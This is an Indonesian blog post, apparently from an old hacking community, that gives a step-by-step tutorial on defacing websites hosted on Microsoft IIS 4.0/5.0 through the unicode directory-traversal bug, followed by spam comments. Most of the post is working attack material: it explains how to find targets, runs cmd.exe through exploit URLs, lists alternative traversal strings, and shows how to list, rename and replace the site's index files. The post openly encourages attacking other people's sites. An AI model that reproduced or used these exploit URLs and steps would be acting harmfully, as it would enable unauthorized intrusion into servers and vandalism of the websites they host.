Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman
depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan
kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan
loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana
sich nge-deface situs?" seperti yang telah gue sebutin diatas proses
deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada
server tempat situs itu berada. Sehingga hal pertama yang harus kamu
ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari
server situs tersebut. Hal ini karena karakteristik dari tiap OS yang
berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat
berbedaapabila kita ingin melakukan deface diantara kedua OS tsb.
Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan
satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai
kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste
tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani"
(master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS.
Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft
Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang
dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar
mengenai "unicode bug" ini karena sayah takut salah menjelaskan
(ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau
...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa
mengeksplorasi komputer target dengan hanya menggunakan internet
browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih
dahulu di search engine (google,yahoo,dll)...key nya terserah
kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah
selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya
mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat
mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning
Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di
http://accessftp.topcities.com/.... or memakai cara manual yg lebih
sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR
IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih
situs lain sebagai sasaran....(yg sabar yah nak nyari
targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan
yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di
bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan
PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh
lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED
nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo
misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg
koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa
kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web
tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu
dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww
waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html
ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
17 komentar on Deface Dengan menggunakan Microsoft IIS :
Excellent web site you have got here.. It's hard to find high-quality writing like yours these days. I really appreciate individuals like you! Take care!!
my weblog: diarrhea remedies
It is really a great and helpful piece of info.
I am satisfied that you shared this helpful information with
us. Please keep us up to date like this.
Thanks for sharing.
Here is my homepage :: tattoo removal cream reviews
bookmarked!!, I love your website!
Here is my web page refinishing Hardwood Floors
This is a topic that's near to my heart... Take care! Where are your contact details though?
Also visit my site: Recycling Facts
Woah! I'm really loving the template/theme of this blog. It's simple,
yet effective. A lot of times it's very difficult to get that "perfect balance" between superb usability and visual appearance. I must say you have done a amazing job with this. In addition, the blog loads extremely fast for me on Opera. Outstanding Blog!
my web-site; permanent hair straightening
Hi, i think that i saw you visited my website thus i came to “return the
favor”.I am trying to find things to enhance my site!
I suppose its ok to use some of your ideas!!
Feel free to surf to my web site :: Coconut oil for hair
I love it when individuals get together and share
opinions. Great website, stick with it!
My blog post :: diaper rash home remedies
Fantastic blog! Do you have any hints for aspiring writers?
I'm planning to start my own website soon but I'm a little lost on
everything. Would you recommend starting with a free
platform like Wordpress or go for a paid option? There are so
many choices out there that I'm totally confused .. Any tips? Many thanks!
Feel free to surf to my blog :: dry scalp treatments
I really like your blog.. very nice colors & theme. Did you design this website yourself or did you
hire someone to do it for you? Plz answer back as I'm looking to create my own blog and would like to know where u got this from. kudos
Take a look at my webpage; Coconut Oil For Hair
This post will assist the internet people for building up new weblog
or even a weblog from start to end.
Feel free to visit my site; Eco Sanctuary
Thanks for finally talking about > "Deface Dengan menggunakan Microsoft IIS" < Loved it!
My site: world Of tanks hack
Hello! This is my first comment here so I just
wanted to give a quick shout out and say I genuinely enjoy reading through your articles.
Can you recommend any other blogs/websites/forums
that cover the same subjects? Thank you so much!
Here is my web site; The Interlace
Hi, Neat post. There is an issue along with your web site in web explorer, could check this?
IE nonetheless is the marketplace leader and a large part of
people will leave out your fantastic writing because of this problem.
Also visit my homepage; candy crush Saga hack
Hi my loved one! I want to say that this article is amazing, great written and come with almost
all significant infos. I would like to peer
extra posts like this .
Feel free to surf to my blog post ps3 jailbreak
I really like your blog.. very nice colors & theme. Did you
create this website yourself or did you hire someone to do
it for you? Plz respond as I'm looking to create my own blog and would like to find out where u got this from. many thanks
Feel free to visit my webpage - Minecraft Crack
I'm amazed, I have to admit. Rarely do I encounter a
blog that's both equally educative and engaging, and without a doubt, you have hit the nail on the head.
The problem is an issue that not enough folks are speaking intelligently
about. Now i'm very happy that I came across this in my search for something concerning this.
my blog post: internet marketing
You have made some really good points there. I checked on the web to find out more about the
issue and found most people will go along with your views on this web site.
Here is my web site; Dr. Patel license suspension
Post a Comment and Don't Spam!